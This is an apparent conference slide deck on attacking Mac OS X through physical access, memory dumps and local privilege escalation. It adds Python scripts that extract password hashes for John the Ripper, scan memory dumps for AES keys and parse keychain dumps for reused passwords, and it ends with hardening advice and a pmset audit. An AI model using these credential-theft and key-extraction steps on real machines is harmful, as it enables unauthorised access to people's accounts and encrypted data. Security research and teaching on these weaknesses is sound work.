Hack Mac OS X
Tips and tricks for Mac OS X hacking
Summary
Introduction
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion

Introduction

Market Share
[Two charts, values lost in extraction: Mac vs Windows market share, and market share by continent]

Mac OS X history
1996: Apple purchases NeXT and the NeXTSTEP OS
1996: Steve Jobs returns to Apple (he had left in 1985)
1999: First version of Mac OS X Server (1.0)
2001: First version of Mac OS X for workstations (10.0 Cheetah)
2006: First Mac (MacBook) with an Intel processor instead of PowerPC

Mac OS X architecture
UNIX system
Based on the Darwin OS (hybrid kernel XNU)
The XNU kernel combines the Mach micro-kernel inherited from NeXTSTEP with BSD (FreeBSD) kernel code
But Darwin does not include the "Quartz" graphics engine (Quartz, Aqua and the Finder are Apple's proprietary layer on top of it)

Mac OS X architecture (layer diagram; only the box labels survived extraction)
User space:   Applications (Finder/Dock, Login Window), Application services (Quartz/Aqua), Core services, Mac interfaces, launchd
Kernel space: Darwin = XNU (Mach + BSD), I/O Kit ("IO Toolkit"), Platform Expert
Hardware:     EFI firmware

Exploitation of target mode

About target mode
During startup, press "T": the Mac boots into Target Disk Mode and exposes its internal disk over FireWire (or Thunderbolt) as an external drive to whatever host it is plugged into
Access is not protected by default (no firmware password is set)
Full access to the file system of the disk through the file manager of the host Mac; the host mounts an external volume with ownership ignored, so the target's file permissions do not apply (user home directories, /var/db, ...)

Alternatives
Single-user mode (press "Apple + S" at startup): a root shell without any password
From a live OS on a USB/CD device: press "Alt" (Option) at startup and pick the boot device
From the Mac OS X installation DVD: press "C" at startup and select "Reset Password" from the installer utilities
All three are blocked by a firmware (EFI) password and by nothing else; a login password plays no role here

Identify system users
User UIDs in /private/var/db/dslocal/indices/Default/index (and one plist per account in /var/db/dslocal/nodes/Default/users/)
Admin privileges in /var/db/dslocal/nodes/Default/groups/admin.plist (its "users" array lists the members of the admin group, i.e. the sudoers)

Identify system passwords
Password hashes in /var/db/shadow/hash/<GeneratedUID> (10.4 to 10.6, one hex file per user; from 10.7 Lion the salted SHA-512 hash moves into the user's plist as "ShadowHashData")
Recover the clear password with a brute force / dictionary attack (John the Ripper)
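Putting the two previous slides together, as an added example that is not the deck's own code: a Python triage script that walks a volume mounted from Target Disk Mode, lists the local accounts with their admin status, and emits the password hashes in the `user:hash` form John the Ripper reads. Assumed rather than taken from the slides: the mount point, the 10.7 ShadowHashData layout (one binary plist holding a "SALTED-SHA512" blob of 4 salt bytes + 64 digest bytes) and the 169-216 character slice for the 10.4-10.6 salted SHA-1, which is the published `cut -c169-216` recipe.

```python
"""Triage of a Mac OS X system volume mounted from Target Disk Mode:
list local accounts, flag the admins, and emit password hashes for John.

Added example, not the deck's code.  Paths are the Directory Services
"dslocal" files the slides point at; the hash layouts are assumptions
(see XSHA_START and lion_hash) rather than facts taken from the page.
"""
import os
import plistlib

USERS_DIR = "private/var/db/dslocal/nodes/Default/users"
ADMIN_PLIST = "private/var/db/dslocal/nodes/Default/groups/admin.plist"
HASH_DIR = "private/var/db/shadow/hash"

# Assumption (10.4-10.6): /var/db/shadow/hash/<GeneratedUID> is one long hex
# string and the salted SHA-1 (8 hex salt + 40 hex digest) sits at characters
# 169-216, 1-based: the classic `cut -c169-216` fed to `john --format=xsha`.
XSHA_START, XSHA_LEN = 168, 48


def _read_plist(path):
    with open(path, "rb") as fh:
        return plistlib.load(fh)


def _first(rec, key, default=""):
    # dslocal stores every attribute as a list, even single-valued ones.
    values = rec.get(key, [])
    return values[0] if values else default


def lion_hash(rec):
    """10.7: the hash moved into the user plist as ShadowHashData, an array
    holding one binary plist whose "SALTED-SHA512" entry is 4 salt bytes +
    64 digest bytes (assumed layout).  Returned as 136 hex chars, the input
    `john --format=xsha512` expects, or None when absent."""
    blobs = rec.get("ShadowHashData", [])
    if not blobs:
        return None
    blob = plistlib.loads(blobs[0]).get("SALTED-SHA512")
    return blob.hex() if blob and len(blob) == 68 else None


def list_users(volume):
    """{name: {"uid": int, "guid": str, "admin": bool, "sha512": str|None}}
    for every account in the local node, system accounts included."""
    admins = set(_read_plist(os.path.join(volume, ADMIN_PLIST)).get("users", []))
    users = {}
    users_dir = os.path.join(volume, USERS_DIR)
    for entry in sorted(os.listdir(users_dir)):
        if not entry.endswith(".plist"):
            continue
        rec = _read_plist(os.path.join(users_dir, entry))
        name = _first(rec, "name", entry[:-6])
        users[name] = {
            "uid": int(_first(rec, "uid", "-1")),
            "guid": _first(rec, "generateduid"),
            "admin": name in admins,
            "sha512": lion_hash(rec),
        }
    return users


def xsha_hash(volume, guid):
    """Salted SHA-1 (48 hex chars) from the 10.4-10.6 shadow file, or None."""
    path = os.path.join(volume, HASH_DIR, guid)
    if not guid or not os.path.isfile(path):
        return None
    with open(path) as fh:
        chunk = fh.read().strip()[XSHA_START:XSHA_START + XSHA_LEN]
    if len(chunk) != XSHA_LEN or chunk == "0" * XSHA_LEN:
        return None      # field unused: no salted hash stored
    return chunk


def john_lines(volume, min_uid=500):
    """`user:hash` lines for john; xsha for 10.4-10.6, xsha512 for 10.7."""
    lines = []
    for name, info in list_users(volume).items():
        if info["uid"] < min_uid:
            continue
        h = xsha_hash(volume, info["guid"]) or info["sha512"]
        if h:
            lines.append("%s:%s" % (name, h))
    return lines


if __name__ == "__main__":
    import sys
    vol = sys.argv[1] if len(sys.argv) > 1 else "/Volumes/Macintosh HD"
    for name, info in list_users(vol).items():
        print("%-12s uid=%-5d admin=%s" % (name, info["uid"], info["admin"]))
    print("\n".join(john_lines(vol)))
```

Run it against the mount point of the target volume and feed the printed lines to `john --format=xsha` (or `--format=xsha512` for the Lion entries); the script deliberately keeps system accounts in `list_users` so an unexpected admin with a low UID stands out.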

About the Keychain file
The Keychain file stores secret data like Safari passwords, Wi-Fi keys, Skype username/password, Google username/password (Contacts, Picasa), Exchange username/password, ...

Open Keychain files
For each user, the Keychain is stored in /Users/<USER>/Library/Keychains/login.keychain
Keychain files are protected by the keychain password
It is possible to import any Keychain file (Keychain Access > File > Add Keychain) without knowing the keychain password, but its items stay locked
But you have to know the keychain password to exploit it :(
By default, the keychain password is equal to the user's system password :-)
The password can be found in volatile data (a physical memory dump, see the next section)
Or you can attempt to find it by brute force: the keychain file alone is enough to test candidate passwords offline

About FileVault encryption
Encryption of the file system, like BitLocker or dm-crypt
Full disk encryption from the Lion version (10.7, FileVault 2)
Only home directory encryption for previous versions (FileVault 1: the home directory lives in an encrypted sparse image)
Native function since Mac OS X 10.3
".dmg" images can use the same encryption as FileVault (encrypted disk images)
[Diagram, labels only: home directory without encryption vs home directory with FileVault encryption]

Open FileVault file
The FileVault (1) container is stored in /Users/<USER>/test.sparsebundle on the demo system (<USER>.sparsebundle for a normal account)
FileVault files are protected by a password
... and it is the same as the <user> system password :-)
So from target mode it is easy to copy this file and decrypt it once the password is known
The AES key can be found in volatile data (physical memory) ...
Otherwise, without access to the password hashes, it is possible to attempt to find the password by brute force attack against the image itself

Exploitation of physical memory

Physical memory dump
From root access, MacMemoryReader (MMR) can dump RAM
MMR loads a temporary kernel extension that exposes a /dev/mem-like device for reading physical memory (recent Mac OS X versions do not ship /dev/mem)
The "sleepimage" file (/var/vm/sleepimage) contains a physical memory dump written for safe sleep (hibernation mode)
From full disk access (target mode), the "sleepimage" file can be read and analysed like a RAM dump
In recent versions the file is encrypted
Configuration of the "sleepimage" encryption (root privileges required to change it)
Physical extraction (cold boot): RAM keeps its content for seconds after power is cut, longer when the modules are cooled, so they can be read from another machine
Tools to extract RAM (the bootable msramdmp USB/CD): http://www.mcgrewsecurity.com
From DMA access (FireWire), a RAM dump is possible and EASY: the OHCI controller serves physical read/write requests from the bus by DMA, without any cooperation from the running OS
The "pythonraw1394" libraries allow dumping the RAM of a Windows system from Linux (2006, Adam Boileau, Winlockpwn)
The "libforensic1394" library (Freddie Witherden) allows dumping the RAM of Mac OS X from OS X or Linux

DMA access - PoC
Using the "libforensic1394" library is very easy :-) and allows writing a few lines of code (it ships Python bindings) to dump RAM ...

Exploit DMA access
DEMO (video of the FireWire exploit on the author's blog; the URL was garbled in extraction)

Identify secret data
Identify the current username for a locked session (opened without auto logon)
Identify the password for a locked session (opened without auto logon)
Identify the current username for a locked session (opened with auto logon)
Identify the current password for a locked session (opened with auto logon)
Identify just the username for a locked session right after startup (no password has been typed yet, so none is in memory)
A lot of other secret data are in physical memory, like:
Email / Calendar data
Office documents data
Web passwords
Software passwords
Keychain password
...
The AES-128 key used for FileVault encryption can be found in physical memory and allows to:
Decrypt encrypted home directories and fully encrypted disks (Lion version)
Identify secret data on the hard disk (like system passwords)
Unlock the system
The aeskeyfind tool can extract AES keys from a memory image (it searches for the 176-byte expanded key schedule, not for the raw key bytes)
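The DMA PoC slide and the aeskeyfind slide come down to the same operation: read physical memory, then recognise an AES key schedule in it. Below is an added example, neither the author's PoC nor the aeskeyfind source: a self-contained AES-128 key-schedule scanner in Python. The memory source is a `read(addr, n)` callable, so the same scanner works over a file dump (MacMemoryReader output, /var/vm/sleepimage) or a live reader; plugging in libforensic1394's `Device.read(addr, n)` is an assumption about that API. The image it scans in the demo is constructed inside the block, with two expanded keys planted in pseudo-random filler.

```python
"""Finding AES-128 keys in a memory image (the aeskeyfind technique).

An AES-128 key that is in use occupies 176 bytes: 11 round keys, each
derived from the previous one.  A 16-byte candidate at address A is a
real key if the 160 bytes after it are exactly its key schedule, so the
scan needs no knowledge of what the key protects (FileVault, a keychain).

Added example, not the deck's PoC.  Memory comes from a `read(addr, n)`
callable; passing libforensic1394's `Device.read` there is assumed.
"""
import hashlib


def _gmul(a, b):
    """Multiply in GF(2^8) with the AES polynomial x^8+x^4+x^3+x+1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1
        b >>= 1
    return r


def _make_sbox():
    """S-box from its definition (GF(2^8) inverse, then the affine map),
    so no 256-entry table has to be typed in."""
    sbox = [0x63] * 256                   # inverse of 0 is 0 -> 0x63
    for a in range(1, 256):
        inv = next(b for b in range(1, 256) if _gmul(a, b) == 1)
        x = inv
        for s in (1, 2, 3, 4):            # x ^= rotl(inv, s)
            x ^= ((inv << s) | (inv >> (8 - s))) & 0xFF
        sbox[a] = x ^ 0x63
    return sbox


SBOX = _make_sbox()


def _next_round_key(rk, rcon):
    """One step of the AES-128 schedule: 16-byte round key -> next one."""
    t = [SBOX[rk[13]] ^ rcon, SBOX[rk[14]], SBOX[rk[15]], SBOX[rk[12]]]
    out = []
    for j in range(16):
        out.append(rk[j] ^ (t[j] if j < 4 else out[j - 4]))
    return bytes(out)


def expand_key(key):
    """Full AES-128 key schedule: 176 bytes for a 16-byte key."""
    rks, rcon = [bytes(key)], 1
    for _ in range(10):
        rks.append(_next_round_key(rks[-1], rcon))
        rcon = _gmul(rcon, 2)
    return b"".join(rks)


def find_aes128_keys(read, size, chunk=1 << 16):
    """Return [(address, key)] for every 176-byte span that is a valid
    AES-128 key schedule.  Memory is pulled in `chunk`-byte reads and a
    175-byte tail is carried over, so a schedule straddling two reads
    is still seen exactly once."""
    hits, buf, base, pos = [], b"", 0, 0
    while True:
        if pos < size:
            data = read(pos, min(chunk, size - pos))
            if not data:
                break                     # short read: treat as end of image
            pos += len(data)
            buf += data
        limit = len(buf) - 176
        for i in range(limit + 1):
            head = buf[i:i + 16]
            # cheap filter on the second round key before the full expansion
            if buf[i + 16:i + 32] == _next_round_key(head, 1) and \
                    expand_key(head) == buf[i:i + 176]:
                hits.append((base + i, head))
        done = max(0, limit + 1)          # offsets already fully scanned
        buf, base = buf[done:], base + done
        if pos >= size and len(buf) < 176:
            break
    return hits


def demo_image(size=100000):
    """Constructed sample: SHA-256 filler with two expanded keys planted in
    it, the second one straddling the default 64 KiB chunk boundary."""
    filler = b"".join(hashlib.sha256(b"filler%d" % i).digest()
                      for i in range(size // 32 + 1))
    img = bytearray(filler[:size])
    keys = {0x1234: bytes(range(16)), (1 << 16) - 100: hashlib.md5(b"fv").digest()}
    for addr, key in keys.items():
        img[addr:addr + 176] = expand_key(key)
    return bytes(img), keys


if __name__ == "__main__":
    image, planted = demo_image()
    for addr, key in find_aes128_keys(lambda a, n: image[a:a + n], len(image)):
        print("AES-128 key at 0x%08x: %s" % (addr, key.hex()))
```

For a file dump the reader is a seek-and-read over the file; for FireWire it is the device's read method, with `size` set to the physical RAM size. The filter on the second round key keeps the scan cheap: only candidates that pass four S-box lookups pay for the full 160-byte expansion.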
Passware Kit 11.3 can extract the found keys from a memory image and use them to decrypt the disk
PoC to identify Web and software passwords (screenshots)
PoC to identify Mac OS X passwords (screenshots)
Is it possible to extract secret data when full disk encryption is activated (Lion version) via DMA access?
YES!
but NO if:
The system is not started (pre-boot authentication screen: the key is not in RAM yet)
The system is hibernated with power removed from RAM (hibernatemode=25)
AND the parameter that removes the FileVault keys from RAM on standby is activated (destroyfvkeyonstandby=1)

Writing physical memory
... to bypass the session password with the "libforensic1394" library (patching the password check in memory, as Winlockpwn does on Windows)!
but ... it does not work yet :-(
The Inception tool (breaknenter.org) will include options to bypass the password screen, but they are not implemented yet
Currently I am looking for the right memory signature for 10.6 and 10.7
And the Thunderbolt port
is like a FireWire port with an adapter (the same DMA exposure, through the PCIe bridge)
and so can be exploited :-)

Exploitation of user privileges

Obtain system user access
From physical access
Identify a trivial password
Exploit DMA access, single-user mode, ...
Exploit the auto-logon session of the first configured user (an administrator, so root privileges through sudo by default)
From remote access
Identify services and usernames from the mDNS service (UDP/5353) of Bonjour (or "Zeroconf"); the default computer name embeds the owner's name
From remote access
Through common "server side" vulnerabilities (SMB, SSH, web, ...)
Through "client side" vulnerabilities in Safari, iTunes, iChat, QuickTime, Skype, ...
[Pie chart: Top 13 vulnerabilities in 2010 by vendor/product; the labels were lost in extraction]
[Chart: security updates for Apple products, each vulnerability classed as "MS and Apple are affected", "Just Apple is affected" or "Apple is not affected"]
"exploit-db.com" stores a lot of remote exploits
Sample of remote exploits for Mac OS X (screenshot)
"exploit-db.com" stores 15 remote exploits for the Mac OS X platform from 2010 and 145 remote exploits for the Windows platform from 2011 (counts at the time of the talk)
Most of the vulnerabilities are due to third-party software
Like on other OSes, "Metasploit" allows easy execution of code in the context of the user
Safari exploit > CVE-2011-3230

User privilege escalation
Previously, if you obtained root privileges:
You can execute a lot of operations (cf. Exploitation of target mode)
but the password can still be useful (Keychain, FileVault) ...
Previously, if you obtained user privileges:
You can attempt to extract secret data from data or system files (personal data, passwords stored in txt files, emails)
You can attempt to identify vulnerabilities of configuration or software
You can attempt to exploit native Mac OS X functions
...

Exploit Mac OS X vulnerabilities
Exploitation of vulnerabilities is more difficult with ASLR (library randomisation from the Leopard version, full ASLR from Lion)
"exploit-db.com" stores a lot of local root exploits
Sample of local root exploits for Mac OS X (screenshot)
44 local exploits for Mac OS X since 2003 and 220 for Windows since 2011
Most of the vulnerabilities are due to third-party software

Exploit native functions
Using and copying passwords stored in the Keychain (Keychain Access, "Show password") requires the user password

Exploit Keychain access
But the "security" command allows bypassing the password prompt ... :-)
Sample of the "security dump-keychain -d" command (screenshot: "It's my Evernote password")
Caveat: in the user's GUI session each item still raises an Allow/Deny confirmation dialog, which can be clicked or scripted; it is not a password prompt
Other extracted passwords: Safari passwords, Wi-Fi keys, Skype username/password, Google username/password (Contacts, Picasa), Exchange username/password, ...
One of these passwords may be the root password ...
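As an added example, not the deck's screenshot or code: a parser for the text `security dump-keychain -d` prints, turning it into (class, account, service/server, secret) tuples and grouping entries that share a secret, which is the quickest way to spot the reuse the slide hints at. The dump it parses is constructed to mirror the command's layout on 10.6/10.7 (`keychain:` / `class:` / `attributes:` / `data:` blocks); the four-character attribute names are the ones the tool shows, the accounts and secrets are invented.

```python
"""Parse `security dump-keychain -d` output and flag reused secrets.

Added example, not from the deck.  SAMPLE_DUMP is constructed to follow
the command's record layout; run the real command in the logged-in
user's session (login.keychain is unlocked there) and pass its stdout
to credentials() / reused_secrets().
"""
import re
from collections import defaultdict

SAMPLE_DUMP = '''keychain: "/Users/alice/Library/Keychains/login.keychain"
class: "genp"
attributes:
    0x00000007 <blob>="Evernote"
    "acct"<blob>="alice@example.com"
    "desc"<blob>=<NULL>
    "svce"<blob>="Evernote"
data:
"Ev3rn0te!"
keychain: "/Users/alice/Library/Keychains/login.keychain"
class: "inet"
attributes:
    "acct"<blob>="alice"
    "path"<blob>=<NULL>
    "ptcl"<uint32>="htps"
    "srvr"<blob>="mail.example.com"
data:
"Summer2011"
keychain: "/Users/alice/Library/Keychains/login.keychain"
class: "genp"
attributes:
    "acct"<blob>="alice"
    "svce"<blob>="Exchange"
data:
0x53756d6d657232303131  "Summer2011"
keychain: "/Users/alice/Library/Keychains/login.keychain"
class: "genp"
attributes:
    "acct"<blob>="alice"
    "svce"<blob>="Skype"
data:
<NULL>
'''

# "acct"<blob>="value"  -> four-char attribute name and its string value
_ATTR = re.compile(r'^\s*"(\w{4})"<blob>="(.*)"\s*$')
# binary secrets are printed as hex followed by a quoted rendering
_DATA_HEX = re.compile(r'^0x([0-9a-fA-F]+)\s+"')


def _decode_data(line):
    """The single line after `data:`: quoted text, hex + quoted, or <NULL>."""
    line = line.strip()
    if line == "<NULL>":
        return None
    m = _DATA_HEX.match(line)
    if m:
        return bytes.fromhex(m.group(1)).decode("utf-8", "replace")
    if len(line) >= 2 and line.startswith('"') and line.endswith('"'):
        return line[1:-1]
    return line


def parse_dump(text):
    """List of {"keychain", "class", "attrs", "secret"} records."""
    items, cur, want_data = [], None, False
    for line in text.splitlines():
        if line.startswith("keychain:"):
            if cur:
                items.append(cur)
            cur = {"keychain": line.split('"')[1], "class": None,
                   "attrs": {}, "secret": None}
            want_data = False
        elif cur is None:
            continue
        elif line.startswith("class:"):
            cur["class"] = line.split('"')[1]
        elif line.startswith("data:"):
            want_data = True
        elif want_data:
            want_data = False
            cur["secret"] = _decode_data(line)
        else:
            m = _ATTR.match(line)
            if m:
                cur["attrs"][m.group(1)] = m.group(2)
    if cur:
        items.append(cur)
    return items


def credentials(text):
    """(class, account, server-or-service, secret) per item; inet items
    carry "srvr", generic passwords carry "svce"."""
    out = []
    for it in parse_dump(text):
        a = it["attrs"]
        out.append((it["class"], a.get("acct"),
                    a.get("srvr") or a.get("svce") or "?", it["secret"]))
    return out


def reused_secrets(text):
    """{secret: [where, ...]} for secrets that appear in more than one item:
    a password shared by a mail server and a VPN is a likely login password."""
    by_secret = defaultdict(list)
    for _cls, _acct, where, secret in credentials(text):
        if secret:
            by_secret[secret].append(where)
    return {s: w for s, w in by_secret.items() if len(w) > 1}


if __name__ == "__main__":
    for row in credentials(SAMPLE_DUMP):
        print(row)
    print("reused:", reused_secrets(SAMPLE_DUMP))
```

With a real dump, `reused_secrets` is the list to try first against the local account (and sudo), since a secret shared across several services is the one most likely to also be the login password.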

Exploit Keychain
Exploitation is possible just with "login.keychain"
Exploitation is possible because "login.keychain" is automatically unlocked at login ... only if the keychain password is identical to the user's system password
Opening "system.keychain" requires a login and password (administrator)

Recent tips to escalate privileges
CVE-2011-3435/3436: abuse the dscl command to dump password hashes or to reset a password without being root (Lion 10.7.0 and 10.7.1, fixed in 10.7.2):
$ dscl localhost -read /Search/Users/<User>
$ dscl localhost -passwd /Search/Users/<User>
Exploit the "macport" configuration to get a remote root (ports are fetched over plain HTTP without signature checks, so an evilgrade-style man-in-the-middle can serve a trojaned port):
http://blog.infobytesec.com/2011/07/pwning-mac-os-x-withevilgrade-macports.html?m=1
Exploit an application outside the sandbox to bypass the restrictions on an application within the sandbox (CoreLabs, Lion sandbox):
http://www.generation-nt.com/mac-lion-faille-sandbox-corelabsactualite-1501811.html

Conclusion

Mac OS X secured or not?
A secured Mac OS X is as secure as a secured Windows
http://www.securityvibes.fr/produits-technologies/osx-lion-securite/
More exploits for Windows than for Mac OS X because of market share (more users, so more research ...)

Physical access is not secured
By default, my son could own my MacBook by single-user mode, by target mode, by DMA access, ...
as opposed to a Windows PC (except through DMA)
To limit that, it is necessary to install software to configure an EFI (firmware) password, and it is not as easy as under a BIOS!
Password prompt during startup
but a change in the hardware configuration (e.g. the amount of RAM) allows resetting the password ...

Optimum protection
Use full disk encryption (FileVault 2, TrueCrypt, ...)
Encrypt the "sleepimage" file, force power removal from RAM on sleep (hibernatemode=25)
Use a different password for system access and Keychain, or use certificate authentication (http://www.opensc-project.org/sca/wiki/LogonAuthenticate)
Use strong passwords and change your passwords regularly
Configure the system to install security patches automatically
Configure the local firewall to block incoming connections
Install an antivirus (ClamXav, Avast, Intego, BitDefender, F-Secure, Panda Antivirus, ...)
Disable remote services (mDNS, SMB, web/HTTP, ...)
and avoid publishing your system backups or keychain files on the Internet
no .... ???? Yes !!!
Google is your friend, or not (for the victims)
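The two pmset settings named on the full-disk-encryption slide (hibernatemode=25, destroyfvkeyonstandby=1) and again in this hardening list can be checked from the output of `pmset -g`. The block below is an added example, not from the deck: a small audit over two constructed `pmset -g` outputs, one default laptop and one hardened. That a given release exposes destroyfvkeyonstandby at all (it appeared with Lion) is an assumption to verify against `man pmset` for the system being audited.

```python
"""Audit the pmset settings that decide whether the FileVault key stays in
RAM while a sleeping laptop is out of your hands: hibernatemode=25 cuts
power to RAM on sleep (only the on-disk sleepimage remains) and
destroyfvkeyonstandby=1 drops the FileVault key before standby, which
together defeat DMA and cold-boot recovery of the key.

Added example, not from the deck.  DEFAULT_LAPTOP and HARDENED_LAPTOP are
constructed `pmset -g` outputs; on a real Mac pass in the command's stdout.
"""
import re

DEFAULT_LAPTOP = """System-wide power settings:
Currently in use:
 standbydelay         4200
 standby              1
 hibernatefile        /var/vm/sleepimage
 hibernatemode        3
 sleep                10
 displaysleep         5
"""

HARDENED_LAPTOP = """System-wide power settings:
Currently in use:
 standbydelay         4200
 standby              1
 hibernatefile        /var/vm/sleepimage
 hibernatemode        25
 destroyfvkeyonstandby 1
 sleep                10
"""

# setting -> (expected value, why a different value matters, command that fixes it)
CHECKS = {
    "hibernatemode": ("25",
                      "RAM keeps power on sleep, so keys stay readable via DMA or cold boot",
                      "sudo pmset -a hibernatemode 25"),
    "destroyfvkeyonstandby": ("1",
                              "FileVault key is kept in RAM across standby",
                              "sudo pmset -a destroyfvkeyonstandby 1"),
}

# " hibernatemode        3"  ->  key, value (section headers end with ':')
_LINE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9]*)\s+(\S.*?)\s*$")


def parse_pmset(text):
    """Map of setting -> value from `pmset -g` output."""
    settings = {}
    for line in text.splitlines():
        if line.rstrip().endswith(":"):
            continue
        m = _LINE.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def audit(text):
    """[(setting, current, expected, why, fix)] for every weak setting.
    A missing key counts as weak: the default is the insecure behaviour."""
    settings = parse_pmset(text)
    findings = []
    for key, (expected, why, fix) in CHECKS.items():
        current = settings.get(key, "<unset>")
        if current != expected:
            findings.append((key, current, expected, why, fix))
    return findings


if __name__ == "__main__":
    import subprocess
    out = subprocess.run(["pmset", "-g"], capture_output=True, text=True).stdout
    for key, cur, exp, why, fix in audit(out):
        print("%s=%s (want %s): %s -> %s" % (key, cur, exp, why, fix))
```

The price of hibernatemode 25 is a slower wake, since the machine has to read the whole sleepimage back; that trade-off is what the slide's "force power removal from RAM" line asks you to accept.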

Keychain files and GHDB!
Google Hacking DataBase: operators inurl, intitle, filetype
Very easy to identify keychain files published on the web (".keychain" files)
... and APT
iSEC Partners: http://www.isecpartners.com/storage/docs/presentations/iSEC_BH2011_Mac_APT.pdf

Questions?
Slides, paper and tools on: http://sud0man.blogspot.com
sganama[at]gmail.com / @sud0man